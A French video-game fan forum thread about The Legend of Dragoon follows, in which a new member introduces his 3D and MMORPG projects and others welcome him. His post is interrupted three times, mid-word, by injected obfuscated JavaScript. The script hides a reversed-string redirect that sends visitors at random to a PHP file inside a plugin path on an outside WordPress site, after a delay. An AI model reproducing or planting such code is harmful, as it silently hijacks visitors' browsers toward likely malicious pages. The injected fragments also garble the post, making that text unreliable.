Giuliani

Présentation des nouveaux membres
Répondre
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Giuliani

Message par giuliani »

Bonjour à tous,

Je me présente Giuliani, 32 piges bientôt, Nordiste d'origine et Toulousain désormais.
Gros fan de Jap'animation, de jeux vidéo et de 3D, je bosse depuis quelques années à la réalisation d'un projet perso de MMORPG (inspiré de l'univers de Toriyama à savoir Dragon Ball, Dragon Quest et Dr Slump):
http://www.dispersions.fr/

Je suis un gr$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and fan de Dragoon que j'avais découvert par hasard le jour de sa sortie sur Playstation et depuis il "hante mes fantasmes" (j'écoute sa b$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ande son qu$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}and je bosse sur la 3D, c'est dire^^)

En ce moment, via Romstation, je me refais le jeu en entier sur PC, et du coup, j'ai repris le développement 3D de chacun des persos, avec un peu de motivation, je serai heureux de sortir un petit truc en 3D sympatoche, je commence également à recréer Célesse (Seles dans la version originale) avant sa destruction et en 3D.^^

mais là je m'étends un peu trop...
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Avatar du membre
yami627
Dragon d'Argent
Dragon d'Argent
Messages : 173
Enregistré le : 10 avr. 2011, 19:56

Re: Giuliani

Message par yami627 »

LOD en 3D moderne ? vivement que tu nous montre ^^

Bienvenue
Image
Avatar du membre
Gatsu
Dragon aux Yeux Rouges
Dragon aux Yeux Rouges
Messages : 46
Enregistré le : 11 mars 2009, 16:19

Re: Giuliani

Message par Gatsu »

Je suis du même avis que Yami ! Ce que donnerais un Dart sur console next gen <3 .
Bienvenu sur le fofo !
Avatar du membre
Septine Madrona
Dragon Noir
Dragon Noir
Messages : 256
Enregistré le : 23 nov. 2008, 19:34
Localisation : Libourne (33)
Contact :

Re: Giuliani

Message par Septine Madrona »

Bienvenue à toi!
J'espère que tu te plairas sur le forum.
Image
Avatar du membre
Lloyd
Dragon d'Argent
Dragon d'Argent
Messages : 100
Enregistré le : 08 mars 2009, 03:59
Localisation : Normandie
Contact :

Re: Giuliani

Message par Lloyd »

Bienvenue sur le Forum!

Célesse avant sa destruction c'est intéressant ça :p
Modifié en dernier par Lloyd le 04 mai 2011, 20:56, modifié 1 fois.
Image
Avatar du membre
giuliani
Dragon de Jade
Dragon de Jade
Messages : 71
Enregistré le : 03 mai 2011, 23:13
Localisation : Toulouse
Contact :

Re: Giuliani

Message par giuliani »

Merci à tous ^^

Je vous montre ça dés que possible
Ne nous prenons pas trop au sérieux, il n'y aura aucun survivant.
Image
Répondre